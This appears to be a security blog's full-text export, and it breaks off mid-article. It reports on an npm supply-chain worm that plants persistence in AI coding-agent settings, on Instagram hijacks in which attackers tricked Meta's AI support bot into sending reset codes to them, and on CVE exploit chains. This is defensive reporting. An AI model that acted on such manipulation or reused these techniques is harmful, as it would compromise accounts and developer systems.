# PurpleOps — Full Resources Content for LLM Ingestion > This file contains the complete text of every published article on purple-ops.io. > It is intended for deep research, RAG pipelines, and LLM training/fine-tuning. > For a concise site overview and article index, see: https://purple-ops.io/llms.txt - Website: https://purple-ops.io - Generated: 2026-06-03T11:18:34.866Z - Total articles: 807 --- ## Category Index - [CVE Analysis](https://purple-ops.io/blog/cve-analysis): Critical vulnerability deep-dives with CVSS scoring and remediation guidance. - [Ransomware Reports](https://purple-ops.io/blog/ransomware-reports): Ransomware group tracking, campaign analysis, and victim disclosures. - [Threat Intelligence](https://purple-ops.io/blog/threat-intelligence): Threat actor profiles, campaign analysis, and emerging attack techniques. - [Vulnerability Alerts](https://purple-ops.io/blog/vulnerability-alerts): Vulnerability disclosures, patch analysis, and risk assessments. - [Security Reports](https://purple-ops.io/blog/reports): Ransomware tracker and long-form research reports. --- ## Miasma Campaign Exploits Red Hat npm Supply Chain - URL: https://purple-ops.io/blog/miasma-red-hat-npm-supply-chain - Date: 2026-06-03 - Category: Threat Intelligence - Tags: miasma-campaign, red-hat, npm-supply-chain, github-actions - Reading time: 5 min **Summary:** The Miasma campaign compromised 32 Red Hat npm packages via a GitHub Actions flaw, deploying a worm to harvest multi-cloud credentials. Miasma Campaign Exploits Red Hat npm Supply Chain A complex supply chain attack, attributed to the "Mini Shai-Hulud" or "Miasma: The Spreading Blight" campaign, has compromised 32 @redhat-cloud-services npm packages across 96 versions. The attackers used a critical logic flaw in npm's GitHub Actions trusted publishing mechanism, enabling the deployment of a worm that harvests multi-cloud credentials. This worm exfiltrates sensitive data, self-propagates across repositories, attempts container escapes, and establishes persistence within AI development systems. The malicious payload remains active, with the current latest version for every affected package delivering the exploit. The attack bypassed standard security controls by manipulating the GitHub Actions workflow, leading to the signing and distribution of malicious artifacts with valid npm provenance. This incident shows supply chain attacks are becoming more sophisticated and demonstrates the critical need for strong validation processes beyond mere provenance checks. The compromise of Red Hat's widely used cloud services packages shows the effects such vulnerabilities can have in the development ecosystem. This event shows a broader trend of faster exploitation timelines and more varied attack vectors. Examples include recent Google Android zero-day patches, successful Instagram account hijacks via Meta's AI support bot, and Iran's expansion of the Handala brand into physical threat operations. Each incident demonstrates distinct challenges in defending against modern cyber threats, from software vulnerabilities and social engineering to nation-state influence. How was the "Miasma" campaign deployed against Red Hat packages? The "Miasma" campaign was deployed by exploiting a logic flaw in npm's GitHub Actions trusted publishing, which binds trust to the repository and workflow filename but not to the branch or ref. An unnamed attacker pushed short-lived oidc- branches to three RedHatInsights repositories: javascript-clients, frontend-components, and platform-frontend-ai-toolkit. On these branches, the attacker rewrote the legitimate CI workflow (ci.yml or release.yml) into a self-publishing job that executed a Bun worm with id-token: write permissions. This worm then exchanged the workflow's OIDC token for npm publish tokens, enabling it to repackage the legitimate npm tarballs. A malicious preinstall hook and a 4.3 MB index.js dropper were injected into these packages. The modified packages were subsequently republished with valid npm provenance, deceiving automated verification systems. The malicious publishes occurred in three waves, with the third wave's payloads remaining the live latest versions for all affected packages. The injected preinstall hook executes the dropper, which ROT-9 decodes a loader that then AES-128-GCM decrypts a 634 KB Bun script payload. If the Bun runtime is not present on the system, the loader downloads it directly from github.com/oven-sh/bun/releases/download/bun-v1.3.13 and executes the decrypted payload using this runtime. This method ensures the worm operates independently of the victim's Node.js installation. Campaign Details and Impact The "Miasma" payload is a harvester of multi-cloud credentials, obfuscated with string-array and PBKDF2 + SHA-256-keystream S-box ciphers. It targets credentials from major cloud providers, development tools, and password managers. Targeted Credentials: Cloud Providers: AWS (IMDSv2, ECS, Secrets Manager, SSM), Azure (managed identity), GCP (service accounts). DevOps & Authentication: HashiCorp Vault tokens, Kubernetes service account tokens, GitHub Personal Access Tokens (PATs), npm tokens, CircleCI, Travis CI, Jenkins, GitLab CI, Buildkite, and Vercel credentials. Local Storage: Bitwarden and gopass vaults, ~/.npmrc, ~/.netrc, shell history, and database history files. API Keys: Anthropic API keys, Stripe sk_/pk_ keys. Propagation Mechanisms: npm Republishing: The payload calls OIDC token exchange and whoami endpoints, repackages tarballs (updateTarball), and signs artifacts via Sigstore. Stolen credentials are exfiltrated to attacker-created public GitHub repositories with the description Miasma: The Spreading Blight. CI Workflow Injection: The worm enumerates GitHub repositories with write access, reads action.yml/action.yaml via GraphQL, and commits a malicious workflow to .github/workflows/codeql.yml on a new branch named chore/add-codeql-static-analysis. This workflow pins actions/checkout to a specific commit hash, masquerading as a security improvement. Advanced Capabilities: Container Escape: Attempts to reach the Docker socket to launch a container that bind-mounts the host /etc/sudoers.d and grants the CI runner passwordless sudo. EDR Awareness: Probes for the presence of endpoint protection solutions such as CrowdStrike, SentinelOne, Carbon Black, and StepSecurity Harden-Runner before executing sensitive operations. AI-Agent Persistence: Installs persistence within developer tooling by targeting .claude/settings.json (with a SessionStart reference) and .vscode/tasks.json. Anti-Analysis: Uses environment variables like FAKE_PLATFORM, TESTING_TAR_FAKE_PLATFORM, __IS_DAEMON, or SKIP_DOMAIN to suppress specific behaviors when detected in automated analysis environments. The initial access method, allowing the attacker to push branches to the RedHatInsights repositories, remains an open question, although git author metadata was forged to appear as a real Red Hat engineer. How did hackers hijack Instagram accounts using Meta's AI support bot? Hackers successfully hijacked several Instagram accounts by exploiting a logic flaw in Meta's AI support assistant. The targeted accounts included those belonging to the beauty brand Sephora, US Space Force Chief Master Sergeant John Bentivegna, security researcher Jane Wong, and the archived Barack Obama White House account, which boasts over two million followers. This incident occurred over a weekend and was reported by many users on platforms like X and Reddit. The exploitation process began with the attackers using a VPN to spoof their geographical location, choosing one near the intended victim. This step helped to circumvent Instagram's security flags based on location. Subsequently, the attackers initiated a chat with Meta's AI support assistant, which had been introduced in March 2026 to facilitate tasks such as password resets without human intervention. The hackers provided the AI bot with the username of the target account and requested to add a new email address. Due to a critical logic flaw, the AI assistant incorrectly sent the security verification code to the attacker's email address instead of the legitimate account owner's. Upon receiving and inputting this code, the bot then presented the attacker with an option to change the password. This method also bypassed two-factor authentication (2FA), a common security measure designed to prevent unauthorized access. The system accepted fake selfie videos, likely generated by AI tools, to bypass identity verification. The legitimate account owners received no warnings, texts, or emails regarding these unauthorized changes. Following the hijack, some accounts, such as the archived Barack Obama White House profile, were used to post fabricated images and pro-Iranian messages, including a statement reading, "The White House is under Shiites' control." Step-by-step videos detailing this exploitation circulated rapidly within blackhat hacking groups on Telegram, leading to the theft and sale of valuable short handles. Meta spokesperson Andy Stone confirmed the issue was fixed and efforts were underway to secure affected accounts. Which Android zero-day did Google patch in June 2026? Google patched one actively exploited Android zero-day, tracked as CVE-2025-48595, as part of its June 2026 security updates. This high-severity vulnerability resides within the Android Framework component. In total, Google addressed 124 flaws across the Android ecosystem with this update. CVE-2025-48595 can be exploited by local attackers to achieve code execution and escalate privileges on devices running Android 14 or later. While Google has not disclosed specific technical details or identified the actors behind the ongoing attacks, the company's bulletin notes "indications that CVE-2025-48595 may be under limited, targeted exploitation." Historically, similar zero-day vulnerabilities in Android have been exploited by commercial spyware vendors and nation-state operations targeting high-profile individuals. This vulnerability shows the ongoing threat of advanced persistent threats using mobile platforms. Beyond this zero-day, the June 2026 patches included fixes for 18 critical vulnerabilities across System, Framework, and Qualcomm closed-source components. These critical issues can lead to remote escalation of privilege without requiring additional execution privileges or user interaction for exploitation. Google encourages all users to update to the latest Android version where possible, as enhancements in newer platforms make exploitation more difficult. The security updates were released in two patch levels: 2026-06-01 and 2026-06-05. The latter bundles all fixes from the first batch, along with patches for closed-source third-party and kernel subcomponents. Google Pixel devices received these updates immediately, while other Android vendors typically require additional time to test and adapt the patches for their specific hardware configurations. This is not the first actively exploited zero-day Google has patched this year; previous updates in December addressed CVE-2025-48633 and CVE-2025-48572, and in March, CVE-2026-21385 (a Qualcomm display component flaw) was patched. For more information on mobile security, see our analysis of a actively exploited zero-day vulnerability affecting Android devices. How is AI accelerating vulnerability exploitation and challenging traditional defenses? Artificial intelligence (AI) is accelerating vulnerability exploitation timelines, compressing the window between disclosure and widespread exploitation from days to mere hours. This rapid acceleration challenges traditional vulnerability management strategies, as remediation and patching processes, which often take weeks, cannot keep pace. The Verizon 2026 DBIR indicates that the median time to patch a critical vulnerability increased year-over-year, from 32 to 43 days, a timeline too slow for the new AI-driven threat environment. AI tools automate vulnerability research for both defenders and attackers. For example, Anthropic's Project Glasswing, using Claude Mythos Preview, reportedly identified over 10,000 high or critical-severity vulnerabilities in important software within a single month. Attackers use similar AI capabilities to quickly identify, reproduce, and weaponize vulnerabilities, leading to indiscriminate exploitation across the internet almost immediately after disclosure. This phenomenon creates an imbalance where attackers operate on timelines measured in hours, while defenders are still operating in weeks. Regulators, such as India's CERT-IN, have begun issuing guidance pushing for sub-day patching expectations for critical vulnerabilities, showing the urgency. However, this demand often overlooks the operational realities of complex enterprise environments, which involve rigorous testing, change windows, business approvals, and compliance obligations. Given that full remediation often cannot match the speed of AI-driven exploitation, security teams must shift their operating models to preempt, validate, and mitigate threats. This shift involves three key steps: first, preempting which vulnerabilities are most likely to be exploited based on traits like broad deployment, internet reachability, and repeatable exploitation; second, rapidly reacting to emerging threats by validating specific organizational exposure and determining exploitability; and third, mitigating risk with temporary controls (e.g., access restrictions, WAF rules, IDS/IPS updates) to buy time for thorough remediation. Solutions like the watchTowr Platform aim to provide preemptive exposure management using AI by identifying exploitable weaknesses and enabling autonomous mitigation to align defender timelines with attacker speeds. How is Iran's MOIS expanding its Handala brand into physical threats and influence operations? Iran's Ministry of Intelligence (MOIS) has expanded its "Handala" brand, traditionally associated with hacktivist cyber operations, to encompass external physical and influence operations targeting US and Israeli interests. This strategic shift uses the global recognition of the Handala brand to amplify MOIS's broader solicitation efforts for physical attacks and espionage. This approach integrates cyber, physical, and influence personas, increasing reach and impact. The expansion includes newly identified threat actor personas alongside the established Handala Hack Team: Handala Popular Resistance Front (HPRF): A newly created persona claiming responsibility for physical attacks within Israel. For instance, the HPRF claimed an arson targeting an Israeli law enforcement official's vehicle in April 2026. This persona directly solicits individuals to conduct physical attacks and espionage, operating within Israel. VIPEmployment: An online network engaging in coordinated inauthentic behavior (CIB) to recruit proxies outside Iran. This persona uses Telegram bots (e.g., @VIPEmployment02Bot) to solicit individuals globally for physical attacks (e.g., killing soldiers, assassinating businessmen, burning consulate buildings, targeting gas pipelines) and espionage against US and Israeli targets for financial rewards. MOISIRAN: A Telegram persona, created in April 2026, which posts purported surveillance footage of Israeli intelligence and military personnel, including individuals from Shin Bet, Mossad, and Unit 8200, as well as Israeli nuclear scientists. MOISIRAN also claims to have successfully recruited an Israeli police officer to share sensitive intelligence. It actively amplifies VIPEmployment's recruitment efforts. Brave Israel: An earlier persona, mostly inactive now, that functioned as a prototype for recruiting and amplifying proxy threat activities. In December 2024, Brave Israel solicited low-level physical threat activities like vandalism, graffiti, and burning cars for monetary rewards in Tel Aviv. It now promotes Handala Hack Team, VIPEmployment, and MOISIRAN content. These personas are assessed to be coordinated by MOIS and are likely part of the Void Manticore (TAG-145, Red Sandstorm, Banished Kitten) cluster, known for targeting Israel and Iranian opposition groups. The combined activities create a complex threat, using Handala Hack Team's cyber reputation to give credibility to physical threat operations and expand the pool of potential recruits for espionage and sabotage. This integration of capabilities can enable advanced targeting through cyber-enabled physical attacks and influence operations, posing increased risks for law enforcement, military, intelligence agencies, and critical infrastructure sectors in US and Israeli regions. Technical Takeaways Supply chain attacks are increasingly complex, bypassing traditional security measures by exploiting trusted publishing mechanisms in CI/CD pipelines. AI-driven tools are compressing vulnerability exploitation windows, requiring real-time threat detection and mitigation strategies. Mobile operating systems remain a key target for actively exploited zero-day vulnerabilities, often used in targeted attacks by sophisticated actors. Logic flaws in emerging AI-powered support systems create novel attack surfaces for social engineering and account compromise, even bypassing multi-factor authentication. Nation-state actors are broadening their operational scope to integrate physical threats, espionage, and influence campaigns with cyber capabilities for impact across multiple domains. --- ## CVE-2026-8206 Kirki Privilege Escalation (CVSS 9.8) - URL: https://purple-ops.io/blog/cve-2026-8206-kirki-privilege-escalation - Date: 2026-06-03 - Category: CVE Analysis - Tags: wordpress, kirki-plugin, cve-2026-8206, privilege-escalation, unauthenticated - Reading time: 5 min | CVSS: 9.8 **Summary:** Kirki plugin CVE-2026-8206 (CVSS 9.8) enables unauthenticated privilege escalation, allowing attackers to hijack WordPress admin accounts on 150,000 sites. CVE-2026-8206 Kirki Privilege Escalation (CVSS 9.8) The Kirki plugin for WordPress has a critical vulnerability, CVE-2026-8206. This unauthenticated privilege escalation flaw, with a CVSS severity score of 9.8, exposes web infrastructure to malicious attacks. Threat actors are actively exploiting CVE-2026-8206 to hijack administrative accounts, creating an immediate threat for approximately 150,000 vulnerable sites. The issue, introduced in the Kirki 6.0 major release, allows a remote adversary to gain full administrative control over affected WordPress installations. The flaw stems from a critical logic error in the plugin's REST API endpoint for password reset requests. Immediate action, including applying vendor updates, is necessary to reduce the risk. This article describes CVE-2026-8206, its technical details, impact, exploitation status, and remediation steps. Organizations managing WordPress sites with the Kirki plugin must patch immediately to prevent unauthorized access and potential site compromise. What is the Impact of CVE-2026-8206? An attacker exploiting CVE-2026-8206 can gain full administrative control over a vulnerable WordPress installation, compromising the entire site. This unauthenticated privilege escalation allows an adversary to bypass authentication and reset the password of any administrative account. The flaw's severity is shown by its CVSS score of 9.8, classifying it as critical. With administrative access, attackers can install malicious plugins, modify site content, or deploy web shells for persistent access. This lets them inject malware, deface websites, redirect visitors, or steal sensitive data. WordPress is widely used, and the Kirki plugin is popular, so this vulnerability affects thousands of websites globally. Our prior analysis of a similar WordPress plugin RCE also shows the risk from such flaws. Organizations operating WordPress sites with the Kirki plugin installed, specifically versions 6.0.0 through 6.0.6, are at risk. While the extension has over 500,000 active installations, researchers estimate about 150,000 sites use a vulnerable version because the issue appeared in the 6.0 major release. This large attack surface requires immediate attention from web administrators to prevent an administrative account takeover. How is CVE-2026-8206 Exploited? CVE-2026-8206 is exploited through an unauthenticated privilege escalation due to a logic flaw in the Kirki plugin's custom REST API endpoint for password reset requests. The main issue is in the plugin's frontend account management features. This flaw requires no prior authentication, allowing any remote adversary to initiate the attack. The exploitation begins with an attacker submitting a crafted request to the plugin's exposed REST API endpoint. Specifically, the vulnerability is in the handle_forgot_password() function of the CompLibFormHandler class. This function processes "forgot password" requests and accepts both a username parameter and a target email address in the incoming request body. The logic flaw occurs in the email verification process. The software identifies the targeted user account by matching the provided username. However, instead of using the email address associated with the identified account, the function uses the email address supplied directly in the attacker's request. This means an unauthenticated attacker can submit a high-privilege username (e.g., an administrator's username) along with an external inbox address they control. The vulnerable system then generates a valid password reset key and sends it directly to the attacker's specified email address. Using this link, the attacker can set a new password for the targeted high-privilege account, gaining full control. Threat intelligence confirms malicious groups are actively exploiting this defect. Wordfence, a WordPress security company, reported its firewall systems blocked 59 attacks targeting CVE-2026-8206 within a 24-hour period. This rapid exploitation shows the immediate threat to unpatched corporate websites. Security researcher CHOIGYEONGMIN responsibly disclosed the issue through a bug bounty program. Recent reports on actively exploited web server vulnerabilities, like our analysis of a LiteSpeed cPanel plugin flaw, show the continuous threat from such exploited flaws in web infrastructure components. Affected Products and Versions The CVE-2026-8206 vulnerability impacts the Kirki plugin for the WordPress content management system. The flaw was introduced with the plugin's 6.0 major release. Affected versions: Kirki plugin for WordPress, versions 6.0.0 through 6.0.6 The vulnerability does not affect Kirki plugin versions prior to 6.0.0, as the vulnerable code was not present in those releases. Approximately 150,000 WordPress sites are estimated to run one of the vulnerable versions. Detection Detecting exploitation attempts or successful compromise related to CVE-2026-8206 requires careful monitoring of WordPress logs, web application firewall (WAF) alerts, and user activity. Security teams should use these detection strategies: WordPress Access Logs: Monitor requests to the Kirki plugin's custom REST API endpoint for password resets. The specific endpoint path may vary but usually involves /wp-json/ followed by Kirki-specific identifiers for account management. Look for a high number of password reset attempts for high-privilege usernames (e.g., 'admin', 'administrator'). Identify password reset requests where the email address in the request body does not match the known email address for the associated username, particularly if the supplied email is external or suspicious. Analyze HTTP request payloads for the handle_forgot_password() function within the CompLibFormHandler class context. Web Application Firewall (WAF) Logs: Review WAF logs for blocked attempts targeting the Kirki plugin's REST API password reset endpoint. WAF rules configured to detect unusual behavior or suspicious API calls may trigger alerts. Look for patterns showing rapid-fire attempts or attempts from unusual geographical locations that might suggest automated exploitation. User Activity Monitoring: Monitor WordPress user logs for sudden password changes for administrative accounts not initiated by a known, legitimate administrator. Investigate the creation of new administrator accounts that cannot be attributed to authorized personnel. Look for unauthorized plugin installations or modifications to existing site content or theme files after a suspicious password reset. Track changes to core WordPress files or the presence of new files that could indicate web shell deployment. Endpoint Detection and Response (EDR) Queries: If EDR is deployed on the underlying server, query for processes initiated by the web server that perform unusual file modifications or network connections, potentially showing post-exploitation activities such as web shell execution. Remediation Timely remediation is important to protect WordPress sites from CVE-2026-8206 exploitation. The main remediation step is to apply the official vendor updates. Patching: Upgrade the Kirki plugin to version 6.0.7 or later immediately. This version contains the security fixes to fix the exploit path. The update addresses the logic flaw in the handle_forgot_password() function, ensuring password reset emails go only to the email address associated with the user account, not to an attacker-supplied address. Regularly check for and apply updates for all WordPress core, themes, and plugins to keep good security. Workarounds and Mitigations: Use a Web Application Firewall (WAF): Configure WAF rules to detect and block suspicious requests targeting the Kirki plugin's password reset REST API endpoint. While not a substitute for patching, a WAF can help reduce exploitation attempts temporarily. Disable unnecessary REST API access: If the Kirki plugin's frontend account management features, including password resets via REST API, are not actively used, consider disabling or restricting access to the specific API endpoint. This may require custom development or the use of other security plugins. Post-Compromise Actions and Monitoring: Audit user registries: Immediately after patching, audit all WordPress user accounts for any unauthorized administrator profiles or suspicious changes to existing user privileges. Remove any unauthorized accounts and revoke elevated privileges if necessary. Review site integrity: Check for any unauthorized plugin installations, modifications to site content, or the presence of unexpected files that could indicate a web shell or other malicious files. Restore from a clean backup if compromise is suspected. Enable multi-factor authentication (MFA): Enforce MFA for all administrative accounts to add another layer of security, making it harder for attackers to maintain access even if they reset a password. Technical Takeaways CVE-2026-8206 is an unauthenticated privilege escalation vulnerability in the Kirki WordPress plugin, with a CVSS score of 9.8. The flaw exists in the handle_forgot_password() function in the CompLibFormHandler class, allowing an attacker to specify any email for password reset links. Exploitation grants an unauthenticated attacker full administrative control over affected WordPress sites, allowing installation of malicious plugins, modification of content, and deployment of web shells. Kirki plugin versions 6.0.0 through 6.0.6 are vulnerable, affecting approximately 150,000 WordPress installations. Threat intelligence confirms active exploitation of CVE-2026-8206. Immediate patching to Kirki 6.0.7 or later is the key remediation. --- ## SafePay Ransomware Hits 6 Victims Across Key Sectors - URL: https://purple-ops.io/blog/safepay-ransomware-threat-activity-diverse-sectors - Date: 2026-06-02 - Category: Ransomware Report - Tags: none - Reading time: 5 min **Summary:** SafePay ransomware led recent activity with 6 new victims, impacting diverse sectors like transportation and professional services in the US and Europe. SafePay Ransomware Activity Targets Diverse Sectors (6 Victims) Statistical Overview Victim Totals This month: 50 This quarter: 1596 Year to date: 4221 Last 24h: 23 Quarterly Breakdown Q1: 2631 | Q2: 1596 | Q3: 0 | Q4: 0 Ransomware activity reported 23 new victims in the last 24 hours. The quarterly total of 1596 shows continued threat actor activity, with the last 24 hours having a moderate number of new victim disclosures. Introduction In the last 24 hours, ransomware groups disclosed 23 new victims. SafePay was the most active with six victims, followed by BlackX with four. Groups like Nova (RALord) and CoinbaseCartel were also active. Primary targets included entities in Transportation & Logistics, Professional Services, and Healthcare. Attacks concentrated in the United States and Europe, especially Germany, Italy, and France. Ransomware Summary Table #GroupVictims (24h)Sample VictimsGeosSectors 1SafePay6Compactmould.com, Lcnet.eu, Parsa-beauty.de (+3)Germany, ItalyTransportation & Logistics, Professional Services 2BlackX4African national congress, Case.law, Elektroverband-bayern (+1)Germany, United StatesHealthcare, Professional Services 3CoinbaseCartel2Cambridge mobile telematics, Panasonic.aeroUnited StatesTransportation & Logistics, Technology / Software 4Krybit2Activ88-interim.com, Www.transbras.com.gtGuatemala, FranceProfessional Services, Transportation & Logistics 5Nova (RALord)2Everlite concept, Ibena textilwerkeGermany, FranceConstruction & Engineering, Manufacturing 6Qilin2Clinica maitenes, Nova medical productsUnited States, ChileHealthcare 7APT731Elections.mia.gov.am from wolves of turanArmeniaGovernment / Public Sector 8Anubis1Power & telUnited StatesTelecommunications 9Interlock1Cold front distributionUnited StatesAgriculture & Food 10Shadowbyt3s1Cropwise (syngenta group)SwitzerlandAgriculture & Food 11Space Bears1StellarFranceTelecommunications SafePay led activity with six new victims, as reported in SafePay ransomware's operations. It primarily impacted Transportation & Logistics and Professional Services across Germany and Italy. BlackX followed with four victims, targeting entities in Healthcare and Professional Services, including the African National Congress, and showing activity in Germany and the United States. CoinbaseCartel and Krybit both focused on Transportation & Logistics and Professional Services, with victims in the United States, Guatemala, and France. Overall, 11 groups contributed to the victim count, with varied targeting strategies across multiple geographies. Victim Distribution By Country United States: 6 Germany: 4 Italy: 3 France: 3 Switzerland: 1 South Korea: 1 South Africa: 1 Armenia: 1 Guatemala: 1 Chile: 1 By Industry Consumer Goods: 1 Telecommunications Equipment Distribution: 1 Software Development: 1 Legal Research: 1 Hospital & Health Care: 1 Grocery and Foodservice Distribution: 1 Aviation & Aerospace: 1 Agricultural Technology and Innovation: 1 Plastic Surgery: 1 Political Organization: 1 The United States remains the most targeted country, followed by European nations such as Germany, Italy, and France. Industry targeting is fragmented, with Professional Services and Transportation & Logistics frequently appearing among impacted sectors. This suggests broad, opportunistic targeting by multiple ransomware groups. Ransomware News Topline - Recent threat intelligence shows evolving ransomware tradecraft, exemplified by a new variant, and demonstrates the importance of strong incident response methods. Campaigns & Operations - Analysis of the EndPoint ransomware, a Midnight-era variant built on the Babuk framework, shows it targets Windows, ESXi, and NAS environments. This ransomware uses a double-extortion model, encrypting data with ChaCha20 and an in-house RSA operation for session key protection. EndPoint specifically targets folders, network shares, and file extensions, while terminating key processes and deleting volume shadow copies. This shows a focused approach to data encryption and system disruption. Vulnerabilities & TTPs - EndPoint ransomware's methods include terminating critical backup and security services such as VSS, SQL, Veeam, and Sophos, along with deleting volume shadow copies via vssadmin. To counter these tactics, effective incident response techniques focus on fast, data-driven detection using tools like EDR, SIEM, SOAR, and XDR. They also use network segmentation and isolation to contain threats and prevent lateral movement. Analyst Note - These developments show organizations continually need to understand emerging ransomware variants and maintain agile, complete incident response frameworks to mitigate their impact. Technical Takeaways SafePay is the most active group, accounting for 6 of the 23 new victims. It primarily targets Transportation & Logistics and Professional Services. BlackX targets diverse sectors, including Healthcare, Professional Services, and a political organization. Multiple ransomware groups, including CoinbaseCartel, Krybit, and Nova (RALord), show varied targeting across sectors such as Transportation & Logistics, Professional Services, and Manufacturing. Geographically, the United States, Germany, Italy, and France are the most frequently impacted regions. The newly analyzed EndPoint ransomware variant uses the Babuk framework to target Windows, ESXi, and NAS environments. It uses ChaCha20/RSA encryption and aggressive tactics such as vssadmin for shadow copy deletion and service termination. --- ## CVE-2026-0257 GlobalProtect Bypass (CVSS 7.8) - URL: https://purple-ops.io/blog/cve-2026-0257-globalprotect-bypass - Date: 2026-06-02 - Category: CVE Analysis - Tags: cve-2026-0257, palo-alto-networks, globalprotect, authentication-bypass, actively-exploited - Reading time: 5 min | CVSS: 7.8 **Summary:** Palo Alto Networks GlobalProtect CVE-2026-0257, an authentication bypass (CVSS 7.8), is actively exploited, granting unauthorized VPN access. CVE-2026-0257 GlobalProtect Bypass (CVSS 7.8) Palo Alto Networks has addressed an authentication bypass vulnerability, identified as CVE-2026-0257, affecting its PAN-OS GlobalProtect VPN portal and gateway. This flaw enables attackers to circumvent authentication mechanisms and gain unauthorized access to VPN services without valid user credentials. The vulnerability was initially assigned a CVSS score of 7.8, classifying it as medium severity, though cybersecurity researchers urge organizations to treat it with urgent attention due to its active exploitation. The Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2026-0257 to its Known Exploited Vulnerabilities (KEV) catalog, showing the threat this vulnerability poses. Observed exploitation attempts began as early as mid-May, with a subsequent increase in activity. These attacks successfully used the flaw across multiple customer environments, showing the operational impact and the necessity for prompt remediation. This post details the technical aspects of CVE-2026-0257, its exploitation chain, affected components, and guidance for detection and remediation. The information presented is derived from vendor advisories and independent security research, intended for network engineers and security analysts responsible for maintaining Palo Alto Networks infrastructure. What is CVE-2026-0257 and why is it critical? CVE-2026-0257 is an authentication bypass vulnerability within Palo Alto Networks PAN-OS GlobalProtect VPN products. It allows an unauthenticated attacker to gain access to VPN sessions by forging authentication override cookies. Despite an initial CVSS score of 7.8, which typically denotes medium severity, the operational implications of this vulnerability are considered critical by Rapid7 and Suzu Labs due to its nature and active exploitation. The criticality of CVE-2026-0257 stems from an attacker's ability to establish an unauthenticated VPN session directly into an organization's internal network. While the base CVSSv4 calculation may factor in direct impact primarily as a VPN connection, the downstream impact to the underlying network makes this a severe event. Security researchers at Rapid7 explicitly advise organizations to treat this flaw as a critical vulnerability, stating that an authentication bypass in an edge-facing enterprise VPN appliance can significantly affect compromised organizations. Denis Calderon, CTO and Principal at Suzu Labs, characterizes an unauthenticated VPN session as an administrative user into the internal network as a critical event without qualification. Impact An attacker exploiting CVE-2026-0257 can bypass standard authentication mechanisms for Palo Alto Networks PAN-OS GlobalProtect VPN portal and gateway. This leads to unauthorized VPN access without requiring legitimate user credentials. The primary risk involves an attacker gaining a foothold within the target network perimeter. Specifically, successful exploitation permits an adversary to impersonate legitimate users and establish authenticated sessions with GlobalProtect gateways. Observed instances show that in some exploitation instances, attackers were assigned valid VPN addresses, effectively granting them access to the internal network. This network access represents a security breach, offering a pathway to internal resources. While initial reports from Rapid7 did not observe indications of successful lateral movement from the compromised GlobalProtect devices themselves, the establishment of an authenticated VPN session is a step for further reconnaissance and lateral movement within a compromised environment. Organizations utilizing Palo Alto Networks GlobalProtect for remote access are at risk if their devices are unpatched and configured vulnerably. The unauthorized access potentially exposes sensitive internal systems and data to adversaries. Exploitation Chain The exploitation of CVE-2026-0257 hinges on a specific misconfiguration within the "authentication override" feature of Palo Alto Networks PAN-OS GlobalProtect. This feature enables a GlobalProtect portal or gateway to issue cookies to an authenticated user, which can then be used in subsequent communications to bypass re-authentication, functioning similarly to a bearer token. This functionality is not enabled by default. The vulnerability arises when two conditions are met: Authentication Override Enabled: The GlobalProtect portal or gateway must be configured to use authentication override cookies. Certificate Misconfiguration: The certificate used to encrypt and decrypt these authentication override cookies must be the same certificate utilized for the GlobalProtect portal or gateway's HTTPS service. Under this specific certificate misconfiguration, the system trusts decrypted cookies without adequately verifying their authenticity. If an administrator reuses the same certificate for both HTTPS services and authentication cookie encryption, an attacker can obtain the certificate's public key. With this public key, an adversary can then generate forged authentication override cookies. These maliciously crafted cookies are subsequently accepted as valid by the vulnerable PAN-OS VPN gateway, allowing the attacker to establish an authenticated VPN session as an impersonated user. Rapid7 successfully developed and demonstrated a Proof-of-Concept (PoC) tool validating this attack method. Their PoC showed that a forged cookie could be accepted by vulnerable GlobalProtect gateways, leading to the successful establishment of authenticated sessions. This capability directly correlates with observed in-the-wild exploitation. Rapid7 documented successful attacks across numerous customer environments beginning around May 17, with a second distinct wave of activity noted on May 21. These real-world attacks involved adversaries using forged authentication cookies to impersonate valid users, some of whom subsequently received VPN addresses and established internal network connectivity. CISA's addition of CVE-2026-0257 to its Known Exploited Vulnerabilities catalog further confirms active exploitation. This vulnerability represents another instance of security issues affecting Palo Alto Networks products under active attack, a trend discussed in our prior analysis of another Palo Alto PAN-OS vulnerability (CVE-2024-3400) and its active exploitation. Affected Products and Versions The vulnerability CVE-2026-0257 affects the Palo Alto Networks PAN-OS GlobalProtect portal and gateway components. The vendor advisory for CVE-2026-0257 states that the flaw impacts various versions of PAN-OS. While the source material indicates these versions are listed in the official Palo Alto Networks advisory, the research findings provided do not enumerate the specific version numbers or ranges. Organizations should consult the official Palo Alto Networks security advisory for a definitive list of all affected PAN-OS versions. Detection Detecting exploitation attempts related to CVE-2026-0257 involves monitoring for anomalous VPN authentication and connection patterns, given that the attack vector involves forged authentication cookies. The core challenge is that the forged cookies are accepted as legitimate by the vulnerable system, making detection of the forgery difficult without specific telemetry. Key areas for detection include: Authentication Logs: Monitor GlobalProtect authentication logs for successful logins from unusual or unexpected source IP addresses, especially those not associated with known organizational VPN users or locations. Look for a high volume of successful VPN authentications within a short period from a single source IP that is not typical for legitimate users. Investigate successful authentications that occur outside of normal business hours or from geographic regions not aligned with employee travel or remote work policies. Correlate successful VPN logins with subsequent activity logs from the same user account for any immediate suspicious actions that deviate from established baselines. VPN Connection Metrics: Observe the assignment of VPN addresses to unknown or suspicious user accounts. Track the total number of concurrent VPN connections; significant spikes might indicate unauthorized access, especially if not correlated with legitimate business needs. Analyze bandwidth usage and data transfer patterns for VPN sessions. Unusual data egress or unexpected internal network scanning originating from a VPN-assigned IP address can be indicative of compromise. System Configuration Audits: Regularly audit GlobalProtect portal and gateway configurations to verify whether the "authentication override" feature is enabled. Specifically check the certificate configuration. Confirm that the certificate used for encrypting and decrypting authentication override cookies is distinct from the certificate used for the GlobalProtect portal/gateway's HTTPS service. A misconfiguration here is a direct indicator of vulnerability. Network Flow Data: Analyze NetFlow or IPFIX data for connections originating from VPN-assigned IP ranges to internal network segments that are typically restricted or not accessed by VPN users. Look for lateral movement attempts from VPN-connected devices to critical internal assets, domain controllers, or sensitive data repositories. Increased scanning activity targeting Palo Alto Networks products, as discussed in our analysis of broader threat environment for Palo Alto products, should prompt heightened vigilance for such authentication bypass attempts. Remediation Addressing CVE-2026-0257 requires immediate action to prevent or mitigate active exploitation. Remediation involves applying the vendor-supplied patch. In situations where immediate patching is not feasible, specific workarounds and mitigations can reduce exposure. Patching Apply Vendor Patch Immediately: Organizations should apply the official patch released by Palo Alto Networks for PAN-OS GlobalProtect as soon as possible. This is the recommended solution to eliminate the vulnerability. Consult the official Palo Alto Networks security advisory for the specific patch versions relevant 